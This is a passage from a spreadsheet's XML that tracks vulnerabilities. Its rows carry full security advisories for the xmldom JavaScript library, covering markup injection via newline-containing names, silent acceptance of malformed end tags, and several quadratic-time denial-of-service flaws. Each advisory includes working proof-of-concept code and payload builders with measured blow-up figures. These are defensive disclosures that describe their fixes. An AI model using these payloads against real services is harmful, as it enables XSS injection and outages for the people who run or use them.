cannot be closed without a breaking change.</t></is></c><c r="T1619" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83608</t></is></c></row><row r="1620"><c r="A1620" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1620" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1620" s="5" t="inlineStr"><is><t>CVE-2026-83609</t></is></c><c r="D1620" s="5" t="inlineStr" /><c r="E1620" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1620" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1620" s="5" t="inlineStr" /><c r="H1620" s="5" t="n"><v>0.003</v></c><c r="I1620" s="5" t="inlineStr" /><c r="J1620" s="5" t="inlineStr" /><c r="K1620" s="5" t="inlineStr" /><c r="L1620" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom</t></is></c><c r="M1620" s="5" t="inlineStr"><is><t>0.9.12</t></is></c><c r="N1620" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1620" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1620" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1620" s="5" t="inlineStr" /><c r="R1620" s="5" t="inlineStr" /><c r="S1620" s="5" t="inlineStr"><is><t>## Summary

An embedded line terminator bypasses xmldom's always-on, WHATWG-mandated creation-time name
validation. `createElementNS`, `createAttributeNS`, `createDocumentType`, and `createAttribute` should
reject a malformed qualified name with `InvalidCharacterError`, but a name whose first line is
well-formed slips through and enters the DOM. On serialization it is emitted verbatim, so the
characters after the line terminator inject markup into the output. The injection reaches the default
serialization path, and enabling `requireWellFormed` does not prevent it.

## Details

`createElementNS`, `createAttributeNS`, and `createDocumentType` route through `validateQualifiedName`,
and `createAttribute` performs the analogous check; each validates the name with
`g.QName_exact.test(name)`. `QName_exact = reg('^', QName, '$')` inherits the `m` flag from xmldom's
shared regexp builder, so the matcher accepts any name whose first line is a valid `QName` and leaves
the remaining lines unconstrained (see Root Cause).

### Root Cause

1. A shared regexp builder compiles anchored productions with the `m` flag.
2. `^…$` under `m` are line anchors, not string anchors.
3. `validateQualifiedName` / `createAttribute` validate with `.test()` against such a production, so a
   line terminator followed by breakout markup passes and the malformed name is stored.

The triggering line terminators are the ECMAScript `LineTerminator` set: U+000A, U+000D, U+2028, U+2029.

## Proof of Concept

```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();

const doc = impl.createDocument('urn:x', 'root', null);
const el = doc.createElementNS('urn:x', 'a\n&gt;&lt;script&gt;x&lt;/script');  // ACCEPTED (no throw)
doc.documentElement.appendChild(el);

// DEFAULT serialization — requireWellFormed NOT set:
console.log(new XMLSerializer().serializeToString(doc));
// Observed: &lt;root xmlns="urn:x"&gt;&lt;a
// &gt;&lt;script&gt;x&lt;/script/&gt;&lt;/root&gt;          &lt;-- injected element on the default path
// Control: createElementNS('urn:x', 'bad&gt;name') throws InvalidCharacterError, confirming the check is
// active and specifically bypassed by the line terminator.
```

## Impact

- **Bypass of the always-on WHATWG creation-time name validation** (`InvalidCharacterError`): a
  malformed name the standard requires be rejected at creation is instead admitted to the DOM.
- **Markup / structure injection.** An application relying on the `create*` APIs to reject malformed
  names (the standard behavior) as a trust boundary is exposed; where the serialized output reaches an
  HTML context, downstream XSS.
- **No serializer option mitigates it.** The admitted name is emitted verbatim under *both* the default
  path and `requireWellFormed: true` — the strict serializer shares the same `m`-flagged blind spot
  (the subject of the sibling serializer advisories) — so the bypassed creation-time check was the only
  layer that could have stopped it. Demonstrated for all four `create*` sites in
  `poc_creation_strict_serialization_bypass.cjs`.

## Fix Applied

`createElementNS`, `createAttributeNS`, `createDocumentType`, and `createAttribute` now reject a name
containing a line terminator with `InvalidCharacterError` — the same result they already give for
other malformed names — because name validation now applies to the whole string. The
`requireWellFormed` serializer's name checks are corrected by the same change. The fix is
non-breaking: such a name was already invalid, and no previously-accepted well-formed name is affected.</t></is></c><c r="T1620" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83609</t></is></c></row><row r="1621"><c r="A1621" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1621" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1621" s="5" t="inlineStr"><is><t>CVE-2026-83611</t></is></c><c r="D1621" s="5" t="inlineStr" /><c r="E1621" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1621" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1621" s="5" t="inlineStr" /><c r="H1621" s="5" t="n"><v>0.004</v></c><c r="I1621" s="5" t="inlineStr" /><c r="J1621" s="5" t="inlineStr" /><c r="K1621" s="5" t="inlineStr" /><c r="L1621" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M1621" s="5" t="inlineStr"><is><t>0.8.15, 0.9.12</t></is></c><c r="N1621" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1621" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1621" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1621" s="5" t="inlineStr" /><c r="R1621" s="5" t="inlineStr" /><c r="S1621" s="5" t="inlineStr"><is><t>## Summary

xmldom's parser silently accepts a **not-well-formed end tag** whose valid name is followed by
trailing content — e.g. `&lt;/a⏎junk&gt;`. The element is closed, the trailing content is discarded, and no
error is reported, even though the XML end-tag production allows only optional whitespace after the
name and both Chromium and Firefox reject such input as `application/xml`. An application that relies
on xmldom to reject not-well-formed input therefore receives a false "valid" result for a document the
specification and browsers consider malformed.

## Details

Across every affected version, an end tag whose valid `Name` is followed by trailing content before
`&gt;` is silently accepted: the element is closed, the residue is dropped, and no error is reported. How
much leaks differs by line (see Affected Versions), but the observable weakness is the same.

On the current (`0.9.x`) line, the parser validates the end-tag name against the XML `ETag` production
with an anchored regular expression (`^ QName S? $`). That expression is compiled with the `m`
(multiline) flag by a shared builder, so `$` matches at an interior line terminator: a valid name on
the first line satisfies the anchored production and any content after the line break escapes the
check. On 0.9.x the whitespace-separated variant (`&lt;/a junk&gt;`) is already rejected; only the
line-terminator variant leaks. Older lines have no anchored end-tag validator at all, so they accept
both the line-terminator and the whitespace variant.

This is **not** content injection — the trailing content is dropped, and the resulting DOM is a normal
single-root document (`&lt;a/&gt;`). The security-relevant property is the silent acceptance of
not-well-formed input: xmldom's parse result disagrees with the specification and with browser XML
parsers, so any control that treats "xmldom parsed it without error" as "well-formed" is bypassed.

### Root Cause

On the `0.9.x` line, where the line-terminator variant specifically leaks:

1. A shared regexp builder compiles anchored productions with the `m` flag.
2. `^…$` under `m` are line anchors, not string anchors.
3. The anchored end-tag production `^ QName S? $` is therefore satisfied by the first line alone, so
   trailing content after a line terminator is neither matched nor rejected — the malformed end tag is
   accepted and the residue silently discarded.

The triggering line terminators are the ECMAScript `LineTerminator` set: U+000A, U+000D, U+2028, U+2029.
U+2028 and U+2029 are not XML whitespace, so they are non-conforming trailing content that nonetheless
leaks because the JavaScript `$` anchor treats them as line boundaries under `m`.

## Affected Versions

Both maintained versions are affected and fixed:

- **`0.9.x`** (`&gt;= 0.9.0, &lt;= 0.9.11`) → **`0.9.12`**: the anchored end-tag validator's `m` flag leaks
  the line-terminator variant. The whitespace variant (`&lt;/a junk&gt;`) is already rejected on this line.
- **`0.8.x`** (`&gt;= 0.8.0, &lt;= 0.8.14`) → **`0.8.15`**: no anchored end-tag validator at all — both the
  line-terminator and the whitespace variant are silently accepted; the fix adds a residue check.

`release-0.7.x` (`&lt;= 0.7.13`) and the unscoped `xmldom` package (range `*`, last release 0.6.0) are
**affected but will not be patched** — they are end-of-life / unmaintained. They share the older-line
behavior (both variants silently accepted, residue dropped).

## Proof of Concept

```js
const { DOMParser, XMLSerializer } = require('@xmldom/xmldom');
const doc = new DOMParser().parseFromString('&lt;a&gt;&lt;/a\njunk&gt;', 'text/xml'); // no error
console.log(new XMLSerializer().serializeToString(doc));
// Observed: &lt;a/&gt;   — the malformed end tag is accepted, "junk" silently discarded, no error reported.
// Expected (per XML spec / Chromium / Firefox): a parse error — the input is not well-formed.
```

## Impact

- **Silent acceptance of not-well-formed XML**: a document the specification and browser XML parsers
  reject is parsed without error.
- **Bypass of a well-formedness / parse-before-trust gate**: an application relying on xmldom to
  reject malformed input treats such a document as valid. Note this is an input-validation /
  parser-differential issue, not content injection — the trailing content is discarded.

## Fix Applied

The parser now reports a not-well-formed end tag whose valid name is followed by trailing content, on both `0.9.12` and `0.8.15` — previously it was accepted silently — and parsing recovers to the byte-identical DOM as before.\
On `0.9.12` the anchored end-tag validator is corrected so a line break followed by trailing content no longer satisfies it, reported as a recoverable `error` when parsing as XML and a `warning` when parsing as HTML.\
On `0.8.15`, which previously performed no end-tag residue validation, an equivalent residue check is added, reported as a recoverable `error` in both XML and HTML.\
Well-formed documents are unaffected.

Because the report is recoverable, the fix is non-breaking: no previously-parsed document begins to
throw and no serialized output changes. Consumers that want strict rejection can escalate the reported
`error` to a fatal one via the parser's error handler (`onError` in `0.9.12`, `errorHandler` in
`0.8.15`). The two versions also differ in the whitespace-separated variant (`&lt;/a junk&gt;`): `0.9.12`
already rejected it with a fatal error in XML and continues to, while `0.8.15` — which validated
neither variant — now emits the same recoverable report for both the whitespace and line-break
variants.

### Residual limitation

By default the parser still **recovers** (it does not reject the document); the reported condition is a
recoverable `error`/`warning`, not a fatal error, to avoid changing the parsed output in a patch
release. Converting this and the other not-well-formed-acceptance cases to a consistent `fatalError` —
including the broader end-tag leniency on the older versions — is deferred to the next breaking release,
tracked at [xmldom/xmldom#1074](https://github.com/xmldom/xmldom/issues/1074).</t></is></c><c r="T1621" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83611</t></is></c></row><row r="1622"><c r="A1622" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1622" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1622" s="5" t="inlineStr"><is><t>CVE-2026-83612</t></is></c><c r="D1622" s="5" t="inlineStr" /><c r="E1622" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1622" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1622" s="5" t="inlineStr" /><c r="H1622" s="5" t="n"><v>0.003</v></c><c r="I1622" s="5" t="inlineStr" /><c r="J1622" s="5" t="inlineStr" /><c r="K1622" s="5" t="inlineStr" /><c r="L1622" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom</t></is></c><c r="M1622" s="5" t="inlineStr"><is><t>0.9.12</t></is></c><c r="N1622" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1622" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1622" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1622" s="5" t="inlineStr" /><c r="R1622" s="5" t="inlineStr" /><c r="S1622" s="5" t="inlineStr"><is><t>## Summary

In HTML mode (`text/html`), a raw-text element (`script`, `style`, `textarea`, `title`) whose closing
tag differs in case from its opening tag (e.g. `&lt;/ScRiPt&gt;` for `&lt;script&gt;`) is mishandled by the
parser, producing quadratic (O(n²)) output growth — a small crafted document parses and serializes
into output orders of magnitude larger, exhausting CPU and memory. A modest input of tens of KB can
therefore cause a denial of service in any service that parses untrusted HTML with xmldom. Only HTML
mode is affected.

## Details

The parser calls `parseHtmlSpecialContent` for each raw-text element in HTML mode, matched via
`isHTMLRawTextElement` / `isHTMLEscapableRawTextElement` (so all four types — `script`, `style`,
`textarea`, `title` — are in scope). It searches for the element's closing tag with
`source.indexOf('&lt;/' + tagName + '&gt;', elStartEnd)`, a byte-for-byte case-sensitive match. A
mixed-case closing tag never matches, so the search returns `-1`, and the following
`source.substring(elStartEnd + 1, -1)` extracts text backwards from the start of the document
instead of the element's content. The function then returns `-1` to the parse loop, which cannot
advance normally and falls back to character-by-character reprocessing. Every raw-text element
re-captures all source text preceding it, so output grows as O(n²) in the number of such elements.

### Root Cause

1. **Case-sensitive close-tag search** (`lib/sax.js:549`): `source.indexOf('&lt;/' + tagName + '&gt;',
   elStartEnd)` does not fold case, contrary to the WHATWG HTML RAWTEXT end-tag-name rule.
2. **Unguarded `-1`** (`lib/sax.js:550`): `source.substring(elStartEnd + 1, elEndStart)` runs even
   when `elEndStart === -1`, extracting text backwards from position 0.
3. **Unstable progression** (`lib/sax.js:556`): the function returns `elEndStart` (`-1`), driving
   repeated character-by-character fallback in the parse loop.

## Affected Versions

Only the `0.9.x` line is affected — the amplification was introduced in `0.9.0-beta.1` when
`parseHtmlSpecialContent` was refactored, and remains through `0.9.11`. The `0.8.x` line is **not**
affected: its older `parseHtmlSpecialContent` does not amplify, despite sharing the same
case-sensitive `indexOf`.

## Proof of Concept

```js
const { DOMParser, XMLSerializer } = require('@xmldom/xmldom');

const n = 1000;
const payload = '&lt;html&gt;&lt;body&gt;' + '&lt;script&gt;x&lt;/ScRiPt&gt;'.repeat(n) + '&lt;/body&gt;&lt;/html&gt;';
const doc = new DOMParser().parseFromString(payload, 'text/html');
const out = new XMLSerializer().serializeToString(doc);
console.log(payload.length, out.length, (out.length / payload.length).toFixed(1) + 'x');
// 18026 9037063 501.3x  — an 18 KB input yields ~9 MB of output
```

Output size grows quadratically with the number of case-mismatched raw-text elements:

```
Repeats | Input len | Output len | Ratio
1       | 44        | 109        | 2.5x
100     | 1826      | 93763      | 51.3x
500     | 9026      | 2268563    | 251.3x
1000    | 18026     | 9037063    | 501.3x
2000    | 36026     | 36074063   | 1001.3x
```

Proof of Concept from @KarimTantawey (tested with `script`); the same amplification occurs for `style`,
`textarea`, and `title`.

## Impact

Small attacker payloads can force disproportionate CPU and memory usage in services that
parse and serialize untrusted HTML via xmldom. The quadratic growth means a modest-sized input
(tens of kilobytes) can produce output in the tens or hundreds of megabytes, potentially
exhausting memory or causing timeouts.

The attack only requires HTML mode (`text/html` MIME type) and mixed-case closing tags for
any of the four raw-text element types. No special configuration or error handler setup is needed.

## Severity note

The CVSS 4.0 vector scores availability only (`VA:H`, with `VC:N/VI:N`): the flaw neither discloses
nor corrupts data, but a small untrusted HTML input (tens of KB) can force output and memory in the
tens to hundreds of MB, enough to exhaust a service's heap or stall its event loop. It is reachable
with no authentication, configuration, or error-handler setup — only that the application parses
untrusted `text/html` and serializes the result.

## Fix Applied

The raw-text closing tag is now matched case-insensitively in HTML raw-text mode (per the WHATWG HTML
[RAWTEXT end-tag rule](https://html.spec.whatwg.org/multipage/parsing.html#rawtext-end-tag-name-state)),
and a missing closing tag is handled explicitly, removing the quadratic output amplification. Output
for well-formed input is unchanged. Non-breaking; 0.9.x-only.</t></is></c><c r="T1622" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83612</t></is></c></row><row r="1623"><c r="A1623" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1623" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1623" s="5" t="inlineStr"><is><t>CVE-2026-83613</t></is></c><c r="D1623" s="5" t="inlineStr" /><c r="E1623" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1623" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1623" s="5" t="inlineStr" /><c r="H1623" s="5" t="n"><v>0.003</v></c><c r="I1623" s="5" t="inlineStr" /><c r="J1623" s="5" t="inlineStr" /><c r="K1623" s="5" t="inlineStr" /><c r="L1623" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M1623" s="5" t="inlineStr"><is><t>0.8.15, 0.9.12</t></is></c><c r="N1623" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1623" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1623" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1623" s="5" t="inlineStr" /><c r="R1623" s="5" t="inlineStr" /><c r="S1623" s="5" t="inlineStr"><is><t>## Summary

xmldom builds the attribute collection of every parsed element by inserting attributes one at a
time into a DOM `NamedNodeMap`. Each insertion first performs a **linear scan of all
already-inserted attributes** to enforce the DOM uniqueness rule (no two attributes with the same
qualified name / namespace+local-name). Parsing an element that carries `M` distinct attributes
therefore costs `1 + 2 + … + M = O(M²)` comparisons.

Because the trigger is simply "one element with many attributes", the attack payload is a
**fully well-formed XML document**. No malformed markup, no error recovery, and no non-default
parser options are involved — parsing completes silently with zero `warning`/`error`/`fatalError`
events. An attacker who can submit a modest, highly compressible document (a single element with
tens of thousands of attributes, ~340 KB uncompressed) can consume seconds of single-threaded CPU
per request, enabling an unauthenticated denial of service.

This is distinct from the known quadratic-**memory** namespace-map issue: it burns **CPU** and it
does not require any namespace declarations or nesting.

## Details

The DOM content handler adds each attribute of a starting element by calling
`el.setAttributeNode(attr)` in a loop:

```js
// DOMHandler.startElement
for (var i = 0; i &lt; len; i++) {
	var namespaceURI = attrs.getURI(i);
	var value = attrs.getValue(i);
	var qName = attrs.getQName(i);
	var attr = doc.createAttributeNS(namespaceURI, qName);
	attr.value = attr.nodeValue = value;
	el.setAttributeNode(attr);          // O(existing attrs) each — see below
}
```

https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom-parser.js#L370-L387

`setAttributeNode` delegates to `NamedNodeMap.setNamedItem`, which calls `getNamedItemNS` to look
for an existing attribute with the same namespace URI and local name before appending:

```js
setNamedItem: function (attr) {
	var el = attr.ownerElement;
	if (el &amp;&amp; el !== this._ownerElement) {
		throw new DOMException(DOMException.INUSE_ATTRIBUTE_ERR);
	}
	var oldAttr = this.getNamedItemNS(attr.namespaceURI, attr.localName);  // linear scan
	if (oldAttr === attr) {
		return attr;
	}
	_addNamedNode(this._ownerElement, this, attr, oldAttr);
	return oldAttr;
},
```

https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L612-L623

`getNamedItemNS` walks the whole list on every call:

```js
getNamedItemNS: function (namespaceURI, localName) {
	if (!namespaceURI) {
		namespaceURI = null;
	}
	var i = 0;
	while (i &lt; this.length) {
		var node = this[i];
		if (node.localName === localName &amp;&amp; node.namespaceURI === namespaceURI) {
			return node;
		}
		i++;
	}
	return null;
},
```

https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L702-L715

For the i-th attribute the scan visits `i-1` entries, so inserting `M` distinct attributes performs
`Θ(M²)` comparisons. There is no hash index or set keyed by name; the map is a plain
array-backed structure.

The same structure exists on 0.8.x. There `setNamedItem` dedups via
`getNamedItem(attr.nodeName)` instead of `getNamedItemNS`, but that method is likewise a full linear
scan, so the complexity is identical:

- `startElement` loop / `setAttributeNode`:
  https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom-parser.js#L159-L176
- `setNamedItem` → linear `getNamedItem`:
  https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L286-L308

The linear-scan `NamedNodeMap` predates the `@xmldom/xmldom` fork and is present unchanged in the
unscoped `xmldom` package back to its earliest published release. In `xmldom@0.1.0`, parsing already
inserts each attribute one at a time (`DOMHandler.startElement` loops calling
`setAttributeNS` → `setAttributeNode` → `NamedNodeMap.setNamedItem`), and `setNamedItem` dedups by
calling `getNamedItemNS`, which is a full linear `while (i--)` scan of the already-inserted
attributes — the identical `O(M²)` structure. The whole unscoped line (`0.1.0` … `0.6.0`) is
therefore affected; the earliest published tag (`0.1.0`) was verified to contain the per-insert
linear dedup scan.

## Proof of Concept

A single well-formed element with `M` distinct attributes. No malformed markup and no options:

```js
'use strict';
var DOMParser = require('@xmldom/xmldom').DOMParser;

function buildDoc(m) {
	var parts = new Array(m);
	for (var i = 0; i &lt; m; i++) parts[i] = 'a' + i + '="x"';
	return '&lt;r ' + parts.join(' ') + '/&gt;';   // &lt;r a0="x" a1="x" ... a{M-1}="x"/&gt;
}

for (var _i = 0, sizes = [2000, 4000, 8000, 16000, 32000]; _i &lt; sizes.length; _i++) {
	var m = sizes[_i];
	var xml = buildDoc(m);
	var t0 = process.hrtime.bigint();
	var doc = new DOMParser().parseFromString(xml, 'text/xml');  // silent: no error events
	var ms = Number(process.hrtime.bigint() - t0) / 1e6;
	console.log(m + ' attrs, ' + xml.length + ' bytes -&gt; ' + ms.toFixed(1) + ' ms; parsed=' +
		doc.documentElement.attributes.length);
}
```

Measured with Node.js v18.20.8 (wall-clock; absolute numbers vary by host, the **scaling** is the
load-bearing fact):

**`@xmldom/xmldom` 0.9.10:**

| M (attributes) | input bytes | time (ms) | ratio vs prev |
|---:|---:|---:|---:|
| 2000  | 18,894  | 13.4   | —     |
| 4000  | 38,894  | 38.7   | ×2.9  |
| 8000  | 78,894  | 100.8  | ×2.6  |
| 16000 | 164,894 | 406.2  | ×4.0  |
| 32000 | 340,894 | 2149.5 | ×5.3  |

**`@xmldom/xmldom` 0.8.13:**

| M (attributes) | input bytes | time (ms) |
|---:|---:|---:|
| 2000  | 18,894  | 10.6   |
| 4000  | 38,894  | 19.9   |
| 8000  | 78,894  | 75.9   |
| 16000 | 164,894 | 657.7  |
| 32000 | 340,894 | 1643.2 |

**`xmldom` (unscoped) 0.6.0:** 4000 → 28.2 ms, 8000 → 131.8 ms, 16000 → 545.2 ms (≈ ×4 per doubling).

Time grows ≈ ×4 per doubling of `M` — quadratic. About **340 KB of well-formed input costs ~1.6–2.1 s
of single-threaded CPU**, and it keeps scaling: doubling the attribute count quadruples the cost.
The document is trivially generated and compresses to a few kilobytes on the wire.

## Impact

Unauthenticated, remotely triggerable denial of service against any service that parses
attacker-influenced XML/HTML with xmldom. A single request holds one event-loop thread for seconds;
a handful of concurrent requests can saturate CPU and stall the process. Because the payload is a
plain well-formed document (one element, many attributes), it passes any "must be well-formed" gate
and reaches the parser before any application-level validation (e.g. schema checks or signature
verification) can run. The payload is highly compressible, so it is effective over compressed
transports.

## Fix Applied

Replaced the per-insert linear duplicate scan on the parse-time dedup path with a name-keyed
index, so de-duplicating an element's attributes during parse is O(M) instead of O(M²) — a
well-formed-but-hostile attribute list can no longer wedge the parse. Behavior-preserving: attribute
order and duplicate resolution (last value wins, first position kept) are byte-identical. Non-breaking
and independent of `requireWellFormed`; ships on both maintained versions.</t></is></c><c r="T1623" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83613</t></is></c></row><row r="1624"><c r="A1624" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1624" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1624" s="5" t="inlineStr"><is><t>CVE-2026-83614</t></is></c><c r="D1624" s="5" t="inlineStr" /><c r="E1624" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1624" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1624" s="5" t="inlineStr" /><c r="H1624" s="5" t="n"><v>0.004</v></c><c r="I1624" s="5" t="inlineStr" /><c r="J1624" s="5" t="inlineStr" /><c r="K1624" s="5" t="inlineStr" /><c r="L1624" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M1624" s="5" t="inlineStr"><is><t>0.8.15, 0.9.12</t></is></c><c r="N1624" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1624" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1624" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1624" s="5" t="inlineStr" /><c r="R1624" s="5" t="inlineStr" /><c r="S1624" s="5" t="inlineStr"><is><t>## Summary

`xmldom`'s malformed-input **error-recovery path** has two quadratic-time (O(n²)) behaviors that a
single crafted input triggers together, so a tiny, highly compressible document (tens of KB) stalls
the Node.js event loop for multiple seconds. It is reachable from `DOMParser.parseFromString` under
**default options** — i.e. from unauthenticated, network-delivered XML — making this an unauthenticated
denial of service. One of the two behaviors, the `normalize()` adjacent-text merge, is **additionally
reachable programmatically** — via a plain `normalize()` call on a DOM built with adjacent text nodes,
independent of the parser — so its fix must live in `normalize()`, not only in a parser bound.

## Details

### Finding A — `parseElementStartPart` quadratic re-scan

A `&lt;` character is not a delimiter in any tag-parsing state, so `parseElementStartPart` scans
forward character-by-character over any embedded `&lt;` until it reaches the next `&gt;` (or end of
input), then validates the accumulated slice as a tag name and throws `invalid tagName:` on failure.
The main loop catches this, reports an `error`, sets `end = -1`, and recovers by advancing a single
character (`appendText(Math.max(tagStart, start) + 1)`). With a long run of `&lt;` and a distant `&gt;`,
each of the O(n) recovery retries performs an O(n) scan plus an O(n) anchored regex validation over
the growing candidate ⇒ **O(n²)**.

Code (0.9.x, `bb7a085dc5ba1eea3212388509b97bb4b4af32b9`):

- `parseElementStartPart` character scan — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/sax.js#L263-L461
- tag-name validation (`setTagName` → throws `invalid tagName`) — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/sax.js#L886-L891
- main-loop `catch` → `error` + `end = -1` — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/sax.js#L234-L242
- single-character recovery fallback — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/sax.js#L247

Code (0.8.x, `e5c14802592685bb872c042c54c3f73758875c85`):

- `parseElementStartPart` — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/sax.js#L227
- `catch` → `error` + `end = -1` — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/sax.js#L202-L208
- recovery fallback — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/sax.js#L213
- `setTagName` validation — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/sax.js#L616-L621

### Finding B — `normalize()` adjacent-text O(K²) merge

`endDocument()` calls `document.normalize()`. For a parent with K adjacent text nodes (produced by
the one-character recovery of Finding A), `normalize()` performs K−1 merges. Each merge does a
`removeChild` — which re-indexes **all** child nodes of the parent (O(K)) — and an `appendData` —
which rebuilds the accumulator string `this.data + text` (O(K)). Total: **O(K²)**.

Well-formed XML cannot produce adjacent text-node siblings *through the parser* (each text run is one
node; comments, CDATA, PIs, and elements sit between runs), so the **parse-path** trigger for Finding B
is the malformed-input recovery that emits single-character text nodes. The same O(K²) merge is,
however, independently reachable via the public `normalize()` API on a programmatically built tree
(see "Finding B is additionally reachable programmatically" below).

Code (0.9.x, `bb7a085dc5ba1eea3212388509b97bb4b4af32b9`):

- `endDocument` → `normalize()` — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom-parser.js#L418-L420
- `normalize()` adjacent-text merge — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L1336-L1356
- `removeChild` re-index-all branch — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L1788-L1798
- `appendData` string rebuild — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L2786-L2790

Code (0.8.x, `e5c14802592685bb872c042c54c3f73758875c85`):

- `endDocument` → `normalize()` — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom-parser.js#L213-L214
- `normalize()` merge — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L529-L549
- `removeChild` re-index-all branch — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L756-L773
- `appendData` string rebuild — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L1533

### Finding B is additionally reachable programmatically (no parser involved)

`Node.prototype.normalize()` is public API on every `Document`/`Element`. A tree built entirely through
the ordinary DOM API — `new DOMImplementation().createDocument(...)`, then K× `createTextNode` +
`appendChild` on one parent — reaches the **same** O(K²) merge when the application calls `normalize()`,
with **no** parsing and **no** error-recovery. The parser is only *one* of the two callers of the
vulnerable merge:

- the parser's automatic `endDocument()` → `document.normalize()` (the parse-path trigger above), and
- any explicit application call to the public `normalize()` on a tree with adjacent text nodes.

`XMLSerializer` does **not** call `normalize()`, so serializing an un-merged tree is O(total text), not
O(K²); the O(K²) surface is exactly those two `normalize()` callers. Consequently a parser-side bound
alone cannot remediate Finding B — the fix must live in `normalize()`.

## Affected Versions

Both findings are present across the full published `@xmldom/xmldom` history — both
currently-maintained versions (`0.8.x` and `0.9.x`) are affected — and across the retired unscoped
`xmldom` line. Finding B's `normalize()` merge is additionally reachable **programmatically**: a
direct `normalize()` call on a DOM built with adjacent text nodes hits the same O(K²) merge,
independent of the parser — so, unlike Finding A, it does not require the malformed-input recovery
path.

## Proof of Concept

Default `DOMParser`, no options. The input is trivially compressible (`a&lt;` / `a&lt;&gt;` repeated) and
never throws — it is parsed via the recovery path.

```js
const { DOMParser } = require('@xmldom/xmldom');

// Silence the expected `error`-level recovery reports (default handler logs
// them to console.error without throwing; only fatalError throws).
console.error = function () {};

function timeParse(label, xml, mime) {
  const t0 = process.hrtime.bigint();
  new DOMParser().parseFromString(xml, mime); // completes; no exception
  const ms = Number(process.hrtime.bigint() - t0) / 1e6;
  console.log(label + '  bytes=' + Buffer.byteLength(xml) + '  time=' + ms.toFixed(1) + ' ms');
}

